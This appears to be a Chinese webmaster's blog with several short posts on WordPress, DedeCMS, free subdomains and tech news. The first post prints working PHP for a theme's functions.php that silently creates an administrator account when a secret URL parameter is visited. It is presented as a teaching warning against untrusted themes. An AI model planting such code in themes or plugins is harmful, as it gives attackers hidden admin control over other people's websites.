如何在WordPress主题中创建后门

是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。

 

add_action( ‘wp_head’, ‘my_backdoor’ );

function my_backdoor() {

if ( md5( $_GET[‘backdoor’] ) == ’34d1f91fb2e514b8576fab1a75a89a6b’ ) {

require( ‘wp-includes/registration.php’ );

if ( !username_exists( ‘backdoor’ ) ) {

$user_id = wp_create_user( ‘backdoor’, ‘pa55w0rd!’ );

$user = new WP_User( $user_id );

$user->set_role( ‘administrator’ );

}

}

}

比如在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://www.yoursitename.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。

如果在把上面这段代码加密一下,很多用户就根本不知道这段代码是做什么的,所以强烈建议大家不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。

织梦DEDECMS文章编辑器标题字数限制解决办法

织梦的后台限制标题字数是60个字符,但是有些文章标题太长了直接被截断,导致标题变的不可读,如何解决这个问题呢?

方法很简单,只需两步就可以搞定织梦DedeCms的文章标题字数的限制:
1、登陆织梦后台选择
系统 -> 其它选项 -> 文档标题最大长度(改此参数后需要手工修改数据表)
修改为需要设置的标题最大长度,默认是60,一般修改成90
2、在dedecms后台,系统 SQL命令行工具 中运行
alter table dede_archives change title title varchar(90)
其中的varchar(90) 中的数字90可以修改为你系统设置中填写的最大标题长度
点击确定,出现成功执行1个SQL语句!

OK,完美解决织梦DEDECMS文章编辑器标题字数限制问题!

解决wordpress无法显示、安装新主题的问题

最近把本站换到vps上之后发现wordpress以前安装的主题都无法显示了,相当郁闷,不知道是那里出现问题了

后台只显示:

You only have one theme installed right now. Live a little! You can choose from over 1,000 
free themes in the WordPress.org Theme Directory at any time: just click on the Install Themes 
tab above.

修改了文件夹的权限也完全没有显示,于是只好求助谷歌百度

原来是php禁用了scandir函数,用winscp打开 /usr/local/php/etc/php.ini 文件,搜索scandir,删除掉就可以了,记得去掉后面的逗号.

重启php服务,刷新下主题管理界面,OK,可以了!

 

可以自定义DNS解析的免费二级域名

免费域名最近实在不多见,不管是tk还是co.cc都被玩坏了,搜索引擎根本不给权重,而且大多数二级域名顶多只是转发,并不提供DNS解析功能,并没有太大价值,博主最近也是想做一些实验,于是翻箱倒柜终于找到几个能用的。

 

权重不错的免费二级米,PR什么的都可以,最主要可以自定义DNS解析,不只是转发。估计能撑一段时间,不过我看做垃圾采集站的很多,一共有19个域名可选。

注册地址:http://uni.me

 

近日codotvu推出免费二级域名.co.vu注册活动,用户可以在codotvu网站上注册免费的.co.vu域名。.co.vu域名支持自定义DNS。

注册地址:http://codotvu.com

 

 

wordpress开启网页Gzip压缩

最近发现首页打开的太慢了,于是决定开启gzip,翻遍了主机控制面板发现管理员给锁掉了,于是只好寻求其他解决办法

最简单的是安装各种gzip插件,一般PHP支持的话很顺利就搞定了.

但是博主的网站偏偏不支持插件,蛋疼啊,只好用修改.htaccess的方法来开启

好在网站空间支持.htaccess,所以很简单,在.htaccess里面加入两行字:

SetOutputFilter DEFLATE

AddOutputFilterByType DEFLATE text/html text/css image/gif image/jpeg image/png application/x-javascript

OK了。

如果没有.htaccess这个文件,可以在本地新建一个文本文档,上传至你的空间,重命名为.htaccess就可以了

中国雅虎邮箱即将关闭服务,用支付宝的同学们注意了

中国雅虎邮箱于2013年4月18日启动整体迁移

中国雅虎邮箱将于2013年8月19日停止服务。

  • 为了能继续访问您的邮箱,如果您的中国雅虎邮箱后缀为 @yahoo.com.cn和 @yahoo.cn,您可以注册并绑定一个全新的阿里云邮箱。该阿里云邮箱可以自动保存您中国雅虎邮箱中的历史邮件,并代收取发往您原中国雅虎邮箱的邮件直至2014年12月31日止,详见帮助
  • 您还可以通过中国雅虎邮箱提供的POP服务将您中国雅虎邮箱中的邮件搬迁至Yahoo.com或任何其他第三方电子邮件供应商,详见帮助

在2013年8月19日前,您仍可以正常使用您原有中国雅虎邮箱。但在此时间之后,若您没有进行如上操作,原中国雅虎邮箱中的所有邮件和相关的帐户设置都将被删除且无法恢复。如需导出联系人信息,请见帮助

您当前所使用的中国雅虎邮箱的发信功能也将随中国雅虎邮箱的停止服务而停止。但是,如果您注册并绑定一个全新的阿里云邮箱,您将可以继续接收到发往您原中国雅虎邮箱的邮件直至2014年12月31日止。

在迁移的过程中,阿里云邮箱将会获得部分您的雅虎帐户信息,如果您不希望阿里云拥有这些信息,您可以在2013年8月19日之前删除您的整个中国雅虎帐户(包括雅虎邮箱,个人资料,以及所有其他雅虎品牌的服务)。如何删除帐户,详见帮助。

中国雅虎邮箱的停止服务不会影响您继续使用雅虎的其他产品及服务。

还好我用的是.com的邮箱,当年支付宝也没有用它推荐的yahoo.com.cn邮箱,支付宝的亲们这次要遭罪了

具体信息 http://migration.cn.yahoo.com/explain.php

大早上发现落伍者网站挂掉了

 

luowuzhe

我靠,该页无法显示~!!!
您正在查看的页由于得了孢疹,现在已经无法打开。Web 站点遇到了一个极端XX的技术困难(靠!连个X字都没有。微软这人开发的什么鸟输入法?!),总之您再怎么调整您的浏览器设置都没用,除非猛敲脑壳,并清洗自己及同事硬盘。建议方法:将该页关闭,并用右手抓住头发,以防情绪冲动。

如果还是没用,请尝试以下操作:

猛击 刷新按钮,或以后再试,警告:刷新显然没用。
如果是在地址栏中键入地址,请确保其拼写正确,你个文盲!!。
要查看连接设置,请猛击工具菜单,然后猛击 Internet 选项。在连接选项卡上,猛击局域网设置。 这些设置应该与您所在的支部或 Internet我这样猪(ISP,I So Pig)所提供的相匹配。
请在半夜以后打驴头狼客户服务部传呼电话01165125888呼98812,接头暗号“胡子蛙,胡子蛙,风吹雨打都不怕”,奖品多多多,必有一款适合您。
如果您的支部书记允许,Microsoft Windows 可以检查您的网络并自动查找网络连接设置。
如果您希望 Windows 进行尝试并查找,请猛击检测网络设置。
默念“比尔·盖子血债累累”40到45遍,然后猛击您自己的头部,之后猛击您伴侣的头部3到5遍,出现金星高级选项卡之后,猛击其中最亮的一个,如果成功,您就是一个相当天才的人,恭喜您!
有些资产阶级变态站点要求 128-位的连接安全性。单击帮助菜单,然后单击关于 Internet Explorer可以查看您所安装的安全性长度到底有多长,到底有多长,这个你们妇女主任知道。
如果您要到达某安全站点,请确保您的安全长度设置能够支持的住。请猛击工具菜单,然后猛击 Internet 选项,选择WG。或者在高级选项卡上,滚到安全部分,复选 SSL 2.0(Shit Shit lovely)、SSL(Shit Shit lovely) 3.0、TLS(Till Love Shit) 1.0、PCT(Pig Catch Tubal) 1.0 设置。
默念“日本人是武大郎的后代,绝不允许台湾独立”三遍,您生活中的一切难题将迎刃而解,但该页还是TMD不可用,真遗憾。
算了,您还是猛击后退按钮,回到驴头狼的猪爷吧。

找不到服务器或发生 DNS(Damn Numrable Shit)错误
Inmerbody Explorer

这谁写的错误页面,程序猿癫狂了吗?

火狐打开百度快照显示欺诈拦截

早上site了下网站后想看一下百度快照,点开之后就变成下面这个样子,看了下百度站长显示没有任何危险问题

firefox

          已报告的欺诈网站!

          此网页在cache.baiducontent.com 已被报告为欺诈网页,并已根据您的安全首选项被拦截。
       
          欺诈网站用来设下陷阱,通过冒充您可能信任的站点,让您泄漏真实的个人或者金融信息。在此类站点输入任何信息都可能会导致帐号被窃或者其他危害。

打开所有网站的快照都是这样显示的,看来是火狐浏览器的问题,今天抽风了!

谷歌停止向中小企业免费提供商业版Google Apps

12月7日消息,谷歌将停止向中小企业免费提供商业版GoogleApps软件,这一举措说明Google开始寻求广告业务以外的收入。

本周四谷歌宣布,10人或10人以下的企业如果使用商业版本的GoogleApps软件,如见将需要为每人每年支付50美元的费用。GoogleApps包含基于网络的电子邮件、文档处理、电子表格和演示工具。

该公司在官方博客中表示,该变动将使得谷歌能够向企业客户提供更加稳定的服务。谷歌说,“企业的增长使得它很快就不适合使用基础版本,它们想要获得诸如全天候客户支持、更大邮箱空间的服务。”

谷歌指出,独立消费者仍将能够使用其众多产品的免费版本,如Gmail。使用免费版本的现有企业客户将可以继续使用,不过它们将不能使用高级版本当中的附加服务。

谷歌今年早些时候表示使用Google Apps的企业超过500万家,但它并未披露免费版本和付费版本各自的客户量。

上述举措是Google Apps的最新变动。该产品在2011年之前,一直向50人或以下的企业免费提供。6月,谷歌推出了Google Compute Engine服务,向有限的客户群提供在线计算服务。

目前谷歌的收入主要来自在线广告业务。

谷歌并未披露其所谓的企业业务的营收数据,但它传达过希望它将成谷歌整体业务重要的一部分的信息。7月,谷歌高级副总裁兼首席业务官尼克什·亚罗拉(Nikesh Arora)将企业业务称之为谷歌“未来的一个增长引擎”。

当然,这个对于盗版office横行的国内来说,并没有任何影响。。。。

 

博客停更的悲剧

这篇没什么实质内容,随便扯淡,放在杂谈里面

果然度娘是需要养的,最近因为忙于工作一直没有更新博客,于是百度就不过来了,看了下服务器日志百度最近一天就来1次,太坑爹了

看来以后更新文章都需要一个周期才行,不然度娘是养不起来的

而且看看收录也是比较蛋疼,原创的文章很多都没有收录,最大原因是刚发表完就被人拿去发论坛秒收了,而且也不带上咱的博客信息,下次看来要在博客下面写上”版权所有,禁止转载”才行,不过可能效果也不是很大.下次我自己发表完就拿去转载算了..

论坛外链现在也越来越不好发了,太多的网站有限制,以后看来就是软文的天下了…

航母style